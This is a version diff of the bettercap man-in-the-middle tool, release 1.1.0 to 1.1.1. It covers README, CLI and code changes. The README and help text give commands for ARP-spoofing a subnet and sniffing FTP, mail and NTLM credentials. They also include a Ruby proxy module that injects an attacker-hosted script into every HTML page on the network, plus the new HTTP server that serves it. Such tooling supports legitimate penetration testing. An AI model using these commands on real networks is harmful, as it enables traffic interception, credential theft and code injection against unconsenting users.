bettercap 1.1.0 → 1.1.1
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/README.md +88 -12
- data/bin/bettercap +54 -13
- data/lib/bettercap/banner +6 -0
- data/lib/bettercap/context.rb +14 -3
- data/lib/bettercap/httpd/server.rb +46 -0
- data/lib/bettercap/sniffer/parsers/mail.rb +1 -1
- data/lib/bettercap/sniffer/sniffer.rb +5 -1
- data/lib/bettercap/spoofers/arp.rb +1 -1
- data/lib/bettercap/version.rb +2 -1
- metadata +4 -2
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 2f2679288f69bf8a4ffddf816e7ea6f38aa9d9f3
|
4
|
+
data.tar.gz: 87d882d14a178868c080c687e1adf4986b654155
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 595325163b629bf5a2c5e7601850db166ed3a85d6536ffe57f2988d8126898bcbe39ec5ac49b86915132434386ab7993d061887b1385ebb77de392a3707a8b4a
|
7
|
+
data.tar.gz: d954e56b18fd9e73f80f58919887f3589b1749eccc9f4a131f6e677f636ba5cbabd14823383ea350cbe7229a4d27e7f2ffd9c4f0e18d0f3751f25924b6088596
|
data/README.md
CHANGED
@@ -4,10 +4,41 @@ BETTERCAP
|
|
4
4
|
Copyleft of **Simone 'evilsocket' Margaritelli**.
|
5
5
|
http://www.evilsocket.net/
|
6
6
|
|
7
|
+
http://www.bettercap.org/
|
7
8
|
---
|
8
9
|
|
9
|
-
|
10
|
-
|
10
|
+
**bettercap** is a complete, modular, portable and easily extensible **MITM** tool and framework with every kind of diagnostic
|
11
|
+
and offensive feature you could need in order to perform a man in the middle attack.
|
12
|
+
|
13
|
+
MOTIVATIONS
|
14
|
+
===
|
15
|
+
|
16
|
+
> Yet another MITM tool? C'mon, really?!!?
|
17
|
+
|
18
|
+
This is exactly what you are thinking right now, isn't it? :D
|
19
|
+
But allow yourself to think about it for 5 more minutes ... what you should be really asking is:
|
20
|
+
|
21
|
+
> Does a complete, modular, portable and easy to extend MITM tool actually exist?
|
22
|
+
|
23
|
+
If your answer is "ettercap", let me tell you something:
|
24
|
+
|
25
|
+
* ettercap **was** a great tool, but it made its time.
|
26
|
+
* ettercap filters **do not** work most of the times, are outdated and hard to implement due to the specific language they're implemented in.
|
27
|
+
* ettercap is freaking **unstable** on big networks ... try to launch the host discovery on a bigger network rather than the usual /24 ;)
|
28
|
+
* yeah you can see connections and raw pcap stuff, **nice toy**, but **as a professional researcher I want to see only relevant stuff**.
|
29
|
+
* unless you're a C/C++ developer, you can't easily extend ettercap or make your own module.
|
30
|
+
|
31
|
+
Indeed you could use more than just one tool ... maybe [arpspoof](http://linux.die.net/man/8/arpspoof) to perform the actual poisoning, [mitmproxy](http://mitmproxy.org) to intercept HTTP stuff and inject your payloads and so forth ... I don't know about you, but I **hate** when I need to use a dozen of tools just to perform one single attack, especially when I need to do some black magic in order to make all of them work on my distro or on OSX ... what about the [KISS](https://en.wikipedia.org/wiki/KISS_principle) principle?
|
32
|
+
|
33
|
+
So **bettercap** was born ( isn't the name pure genius? XD ) ...
|
34
|
+
|
35
|
+
HOST DISCOVERY + ARP MAN IN THE MIDDLE
|
36
|
+
===
|
37
|
+
|
38
|
+
You can target the whole network or a single known address, it doesn't really matter, bettercap arp spoofing capabilities and its multiple hosts discovery agents will do the dirty work for you.
|
39
|
+
Just launch the tool and wait for it to do its job ... again, [KISS!](https://en.wikipedia.org/wiki/KISS_principle)
|
40
|
+
|
41
|
+
![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/discovery.png)
|
11
42
|
|
12
43
|
CREDENTIALS SNIFFER
|
13
44
|
===
|
@@ -23,44 +54,48 @@ The built in sniffer is currently able to dissect and print from the network the
|
|
23
54
|
- POP, IMAP and SMTP credentials.
|
24
55
|
- NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
|
25
56
|
|
57
|
+
![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/credentials.png)
|
58
|
+
|
26
59
|
**Examples**
|
27
60
|
|
28
61
|
Default sniffer mode, all parsers enabled:
|
29
62
|
|
30
|
-
sudo
|
63
|
+
sudo bettercap -X
|
31
64
|
|
32
65
|
Enable sniffer and load only specified parsers:
|
33
66
|
|
34
|
-
sudo
|
67
|
+
sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"
|
35
68
|
|
36
69
|
Enable sniffer + all parsers and parse local traffic as well:
|
37
70
|
|
38
|
-
sudo
|
71
|
+
sudo bettercap -X -L
|
39
72
|
|
40
|
-
TRANSPARENT PROXY
|
73
|
+
MODULAR TRANSPARENT PROXY
|
41
74
|
===
|
42
75
|
|
43
76
|
A modular transparent proxy can be started with the --proxy argument, by default it won't do anything
|
44
77
|
but logging HTTP requests, but if you specify a **--proxy-module** argument you will be able to load
|
45
78
|
your own modules and manipulate HTTP traffic as you like.
|
46
79
|
|
80
|
+
![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/proxy.png)
|
81
|
+
|
47
82
|
**Examples**
|
48
83
|
|
49
84
|
Enable proxy on default ( 8080 ) port with no modules ( quite useless ):
|
50
85
|
|
51
|
-
sudo
|
86
|
+
sudo bettercap --proxy
|
52
87
|
|
53
88
|
Enable proxy and use a custom port:
|
54
89
|
|
55
|
-
sudo
|
90
|
+
sudo bettercap --proxy --proxy-port=8081
|
56
91
|
|
57
92
|
Enable proxy and load the module **example_proxy_module.rb**:
|
58
93
|
|
59
|
-
sudo
|
94
|
+
sudo bettercap --proxy --proxy-module=example_proxy_module.rb
|
60
95
|
|
61
96
|
Disable spoofer and enable proxy ( stand alone proxy mode ):
|
62
97
|
|
63
|
-
sudo
|
98
|
+
sudo bettercap -S NONE --proxy
|
64
99
|
|
65
100
|
**Modules**
|
66
101
|
|
@@ -81,16 +116,57 @@ class HackTitle < Proxy::Module
|
|
81
116
|
end
|
82
117
|
```
|
83
118
|
|
119
|
+
BUILTIN HTTP SERVER
|
120
|
+
===
|
121
|
+
|
122
|
+
You want to serve your custom javascript files on the network? Maybe you wanna inject some custom
|
123
|
+
script or image into HTTP responses using a transparent proxy module but you got no public server
|
124
|
+
to use? **no worries dude** :D
|
125
|
+
A builtin HTTP server comes with bettercap, allowing you to serve custom contents from your own
|
126
|
+
machine without installing and configuring other softwares such as Apache, nginx or lighttpd.
|
127
|
+
|
128
|
+
You could use a **proxy module** like the following:
|
129
|
+
|
130
|
+
```ruby
|
131
|
+
class InjectJS < Proxy::Module
|
132
|
+
def on_request( request, response )
|
133
|
+
# is it a html page?
|
134
|
+
if response.content_type == 'text/html'
|
135
|
+
Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
|
136
|
+
# get the local interface address and HTTPD port
|
137
|
+
localaddr = Context.get.iface[:ip_saddr]
|
138
|
+
localport = Context.get.options[:httpd_port]
|
139
|
+
# inject the js
|
140
|
+
response.body.sub!( '</title>', "<script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script></title>" )
|
141
|
+
end
|
142
|
+
end
|
143
|
+
end
|
144
|
+
```
|
145
|
+
|
146
|
+
And then use it to inject the js file in every HTTP response of the network, using bettercap itself
|
147
|
+
to serve the file:
|
148
|
+
|
149
|
+
sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb
|
150
|
+
|
84
151
|
HOW TO INSTALL
|
85
152
|
===
|
86
153
|
|
154
|
+
**Stable Release ( GEM )**
|
155
|
+
|
156
|
+
gem install bettercap
|
157
|
+
|
158
|
+
**From Source**
|
159
|
+
|
160
|
+
git clone https://github.com/evilsocket/bettercap
|
161
|
+
cd bettercap
|
87
162
|
gem build bettercap.gemspec
|
88
163
|
sudo gem install bettercap*.gem
|
89
164
|
|
90
165
|
DEPENDS
|
91
166
|
===
|
92
167
|
|
168
|
+
All dependencies will be automatically installed through the GEM system.
|
169
|
+
|
93
170
|
- colorize (**gem install colorize**)
|
94
171
|
- packetfu (**gem install packetfu**)
|
95
|
-
- pcaprub (**gem install pcaprub**) [sudo apt-get install ruby-dev libpcap-dev]
|
96
|
-
|
172
|
+
- pcaprub (**gem install pcaprub**) [sudo apt-get install ruby-dev libpcap-dev]
|
data/bin/bettercap
CHANGED
@@ -17,7 +17,7 @@ require 'colorize'
|
|
17
17
|
require 'packetfu'
|
18
18
|
require 'ipaddr'
|
19
19
|
|
20
|
-
Object.send :remove_const, :Config
|
20
|
+
Object.send :remove_const, :Config rescue nil
|
21
21
|
Config = RbConfig
|
22
22
|
|
23
23
|
require 'bettercap/error'
|
@@ -36,16 +36,12 @@ require 'bettercap/proxy/request'
|
|
36
36
|
require 'bettercap/proxy/response'
|
37
37
|
require 'bettercap/proxy/proxy'
|
38
38
|
require 'bettercap/proxy/module'
|
39
|
+
require 'bettercap/httpd/server'
|
39
40
|
|
40
41
|
begin
|
41
42
|
|
42
|
-
|
43
|
-
|
44
|
-
puts '---------------------------------------------------------'.yellow
|
45
|
-
puts " BETTERCAP v#{BetterCap::VERSION}\n\n".green
|
46
|
-
puts ' by Simone "evilsocket" Margaritelli'.green
|
47
|
-
puts ' evilsocket@gmail.com '.green
|
48
|
-
puts "---------------------------------------------------------\n\n".yellow
|
43
|
+
puts BetterCap::BANNER.green.bold
|
44
|
+
puts "\n\n\n"
|
49
45
|
|
50
46
|
ctx = Context.get
|
51
47
|
|
@@ -60,11 +56,11 @@ begin
|
|
60
56
|
ctx.options[:spoofer] = v
|
61
57
|
end
|
62
58
|
|
63
|
-
opts.on( '-T', '--target ADDRESS', 'Target
|
59
|
+
opts.on( '-T', '--target ADDRESS', 'Target IP address, if not specified the whole subnet will be targeted.' ) do |v|
|
64
60
|
ctx.options[:target] = v
|
65
61
|
end
|
66
62
|
|
67
|
-
opts.on( '-O', '--log LOG_FILE', 'Log all
|
63
|
+
opts.on( '-O', '--log LOG_FILE', 'Log all messages into a file, if not specified the log messages will be only print into the shell.' ) do |v|
|
68
64
|
ctx.options[:logfile] = v
|
69
65
|
end
|
70
66
|
|
@@ -101,8 +97,46 @@ begin
|
|
101
97
|
opts.on( '--proxy-module MODULE', 'Ruby proxy module to load.' ) do |v|
|
102
98
|
ctx.options[:proxy_module] = File.expand_path v
|
103
99
|
end
|
100
|
+
|
101
|
+
opts.on( '--httpd', 'Enable HTTP server, default to false.' ) do
|
102
|
+
ctx.options[:httpd] = true
|
103
|
+
end
|
104
|
+
|
105
|
+
opts.on( '--httpd-port PORT', 'Set HTTP server port, default to ' + ctx.options[:httpd_port].to_s + '.' ) do |v|
|
106
|
+
ctx.options[:httpd] = true
|
107
|
+
ctx.options[:httpd_port] = v.to_i
|
108
|
+
end
|
109
|
+
|
110
|
+
opts.on( '--httpd-path PATH', 'Set HTTP server path, default to ' + ctx.options[:httpd_path] + '.' ) do |v|
|
111
|
+
ctx.options[:httpd] = true
|
112
|
+
ctx.options[:httpd_path] = v
|
113
|
+
end
|
114
|
+
|
115
|
+
opts.on('-h', '--help', 'Display the available options.') do
|
116
|
+
puts opts
|
117
|
+
puts "\nExamples:\n".bold
|
118
|
+
puts " - Sniffer / Credentials Harvester\n".bold
|
119
|
+
puts " Default sniffer mode, all parsers enabled:\n\n"
|
120
|
+
puts " sudo bettercap -X\n".bold
|
121
|
+
puts " Enable sniffer and load only specified parsers:\n\n"
|
122
|
+
puts " sudo bettercap -X -P \"FTP,HTTPAUTH,MAIL,NTLMSS\"\n".bold
|
123
|
+
puts " Enable sniffer + all parsers and parse local traffic as well:\n\n"
|
124
|
+
puts " sudo bettercap -X -L\n".bold
|
125
|
+
puts " - Transparent Proxy\n".bold
|
126
|
+
puts " Enable proxy on default ( 8080 ) port with no modules ( quite useless ):\n\n"
|
127
|
+
puts " sudo bettercap --proxy\n".bold
|
128
|
+
puts " Enable proxy and use a custom port:\n\n"
|
129
|
+
puts " sudo bettercap --proxy --proxy-port=8081\n".bold
|
130
|
+
puts " Enable proxy and load the module example_proxy_module.rb:\n\n"
|
131
|
+
puts " sudo bettercap --proxy --proxy-module=example_proxy_module.rb\n".bold
|
132
|
+
puts " Disable spoofer and enable proxy ( stand alone proxy mode ):\n\n"
|
133
|
+
puts " sudo bettercap -S NONE --proxy".bold
|
134
|
+
exit
|
135
|
+
end
|
104
136
|
end.parse!
|
105
137
|
|
138
|
+
raise BetterCap::Error, 'This software must run as root.' unless Process.uid == 0
|
139
|
+
|
106
140
|
Logger.debug_enabled = true unless !ctx.options[:debug]
|
107
141
|
|
108
142
|
Logger.logfile = ctx.options[:logfile]
|
@@ -122,15 +156,17 @@ begin
|
|
122
156
|
|
123
157
|
ctx.spoofer = SpooferFactory.get_by_name( ctx.options[:spoofer] )
|
124
158
|
|
125
|
-
Logger.info " Local
|
126
|
-
Logger.info " Local MAC : #{ctx.iface[:eth_saddr]}"
|
127
|
-
Logger.info " Gateway : #{ctx.gateway}"
|
159
|
+
Logger.info " Local : #{ctx.iface[:ip_saddr]} ( #{ctx.iface[:eth_saddr]} )"
|
128
160
|
|
129
161
|
Logger.debug "Module: #{ctx.options[:spoofer]}"
|
130
162
|
|
131
163
|
ctx.spoofer.start
|
132
164
|
|
133
165
|
if ctx.options[:proxy]
|
166
|
+
if ctx.options[:sniffer] and ( ctx.options[:parsers].include?'*' or ctx.options[:parsers].include?'URL' )
|
167
|
+
Logger.warn "WARNING: Both HTTP transparent proxy and URL parser are enabled, you're gonna see duplicated logs."
|
168
|
+
end
|
169
|
+
|
134
170
|
ctx.firewall.add_port_redirection( ctx.options[:iface], 'TCP', 80, ctx.iface[:ip_saddr], ctx.options[:proxy_port] )
|
135
171
|
|
136
172
|
if not ctx.options[:proxy_module].nil?
|
@@ -157,6 +193,11 @@ begin
|
|
157
193
|
ctx.proxy.start
|
158
194
|
end
|
159
195
|
|
196
|
+
if ctx.options[:httpd]
|
197
|
+
ctx.httpd = HTTPD::Server.new( ctx.options[:httpd_port], ctx.options[:httpd_path] )
|
198
|
+
ctx.httpd.start
|
199
|
+
end
|
200
|
+
|
160
201
|
if ctx.options[:sniffer]
|
161
202
|
Sniffer.start ctx
|
162
203
|
else
|
data/lib/bettercap/context.rb
CHANGED
@@ -15,7 +15,7 @@ require 'bettercap/error'
|
|
15
15
|
|
16
16
|
class Context
|
17
17
|
attr_accessor :options, :iface, :ifconfig, :network, :firewall, :gateway,
|
18
|
-
:targets, :spoofer, :proxy
|
18
|
+
:targets, :spoofer, :proxy, :httpd
|
19
19
|
|
20
20
|
@@instance = nil
|
21
21
|
|
@@ -37,25 +37,32 @@ class Context
|
|
37
37
|
:local => false,
|
38
38
|
:debug => false,
|
39
39
|
:arpcache => false,
|
40
|
+
|
40
41
|
:proxy => false,
|
41
42
|
:proxy_port => 8080,
|
42
|
-
:proxy_module => nil
|
43
|
+
:proxy_module => nil,
|
44
|
+
|
45
|
+
:httpd => false,
|
46
|
+
:httpd_port => 8081,
|
47
|
+
:httpd_path => './'
|
43
48
|
}
|
44
49
|
|
45
50
|
@iface = nil
|
46
51
|
@ifconfig = nil
|
47
52
|
@network = nil
|
48
|
-
@firewall =
|
53
|
+
@firewall = nil
|
49
54
|
@gateway = nil
|
50
55
|
@targets = []
|
51
56
|
@proxy = nil
|
52
57
|
@spoofer = nil
|
58
|
+
@httpd = nil
|
53
59
|
|
54
60
|
@discovery_running = false
|
55
61
|
@discovery_thread = nil
|
56
62
|
end
|
57
63
|
|
58
64
|
def update_network
|
65
|
+
@firewall = FirewallFactory.get_firewall
|
59
66
|
@iface = PacketFu::Utils.whoami? :iface => @options[:iface]
|
60
67
|
@ifconfig = PacketFu::Utils.ifconfig @options[:iface]
|
61
68
|
@network = @ifconfig[:ip4_obj]
|
@@ -120,5 +127,9 @@ class Context
|
|
120
127
|
if !@firewall.nil?
|
121
128
|
@firewall.enable_forwarding(false)
|
122
129
|
end
|
130
|
+
|
131
|
+
if !@httpd.nil?
|
132
|
+
@httpd.stop
|
133
|
+
end
|
123
134
|
end
|
124
135
|
end
|
@@ -0,0 +1,46 @@
|
|
1
|
+
=begin
|
2
|
+
|
3
|
+
BETTERCAP
|
4
|
+
|
5
|
+
Author : Simone 'evilsocket' Margaritelli
|
6
|
+
Email : evilsocket@gmail.com
|
7
|
+
Blog : http://www.evilsocket.net/
|
8
|
+
|
9
|
+
This project is released under the GPL 3 license.
|
10
|
+
|
11
|
+
=end
|
12
|
+
require 'webrick'
|
13
|
+
|
14
|
+
require 'bettercap/logger'
|
15
|
+
|
16
|
+
module HTTPD
|
17
|
+
|
18
|
+
class Server
|
19
|
+
def initialize( port = 8081, path = './' )
|
20
|
+
@port = port
|
21
|
+
@path = path
|
22
|
+
@server = WEBrick::HTTPServer.new(
|
23
|
+
:Port => @port,
|
24
|
+
:DocumentRoot => @path,
|
25
|
+
:Logger => WEBrick::Log.new("/dev/null"),
|
26
|
+
:AccessLog => []
|
27
|
+
)
|
28
|
+
end
|
29
|
+
|
30
|
+
def start
|
31
|
+
Logger.info "Starting HTTPD on port #{@port} and path #{@path} ..."
|
32
|
+
@thread = Thread.new {
|
33
|
+
@server.start
|
34
|
+
}
|
35
|
+
end
|
36
|
+
|
37
|
+
def stop
|
38
|
+
Logger.info 'Stopping HTTPD ...'
|
39
|
+
|
40
|
+
@server.stop
|
41
|
+
@thread.join
|
42
|
+
end
|
43
|
+
end
|
44
|
+
|
45
|
+
end
|
46
|
+
|
@@ -13,7 +13,7 @@ require 'bettercap/sniffer/parsers/base'
|
|
13
13
|
|
14
14
|
class MailParser < BaseParser
|
15
15
|
def initialize
|
16
|
-
@filters = [ /(\d+ )?(auth|authenticate) (
|
16
|
+
@filters = [ /(\d+ )?(auth|authenticate) ([a-z\-_0-9]+)/i ]
|
17
17
|
@name = 'MAIL'
|
18
18
|
end
|
19
19
|
end
|
@@ -31,7 +31,11 @@ class Sniffer
|
|
31
31
|
next if ( pkt.ip_saddr == ctx.iface[:ip_saddr] or pkt.ip_daddr == ctx.iface[:ip_saddr] ) and !ctx.options[:local]
|
32
32
|
|
33
33
|
@@parsers.each do |parser|
|
34
|
-
|
34
|
+
begin
|
35
|
+
parser.on_packet pkt
|
36
|
+
rescue Exception => e
|
37
|
+
Logger.warn e.message
|
38
|
+
end
|
35
39
|
end
|
36
40
|
end
|
37
41
|
end
|
@@ -32,7 +32,7 @@ class ArpSpoofer < ISpoofer
|
|
32
32
|
raise BetterCap::Error, "Couldn't determine router MAC"
|
33
33
|
end
|
34
34
|
|
35
|
-
Logger.info " Gateway
|
35
|
+
Logger.info " Gateway : #{@ctx.gateway} ( #{@gw_hw} )"
|
36
36
|
end
|
37
37
|
|
38
38
|
def send_spoofed_packed( saddr, smac, daddr, dmac )
|
data/lib/bettercap/version.rb
CHANGED
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: bettercap
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 1.1.
|
4
|
+
version: 1.1.1
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Simone Margaritelli
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2015-07-
|
11
|
+
date: 2015-07-25 00:00:00.000000000 Z
|
12
12
|
dependencies:
|
13
13
|
- !ruby/object:Gem::Dependency
|
14
14
|
name: colorize
|
@@ -59,6 +59,7 @@ executables:
|
|
59
59
|
extensions: []
|
60
60
|
extra_rdoc_files: []
|
61
61
|
files:
|
62
|
+
- lib/bettercap/banner
|
62
63
|
- lib/bettercap/base/ifirewall.rb
|
63
64
|
- lib/bettercap/base/ispoofer.rb
|
64
65
|
- lib/bettercap/context.rb
|
@@ -72,6 +73,7 @@ files:
|
|
72
73
|
- lib/bettercap/factories/spoofer_factory.rb
|
73
74
|
- lib/bettercap/firewalls/linux.rb
|
74
75
|
- lib/bettercap/firewalls/osx.rb
|
76
|
+
- lib/bettercap/httpd/server.rb
|
75
77
|
- lib/bettercap/hw-prefixes
|
76
78
|
- lib/bettercap/logger.rb
|
77
79
|
- lib/bettercap/monkey/packetfu/utils.rb
|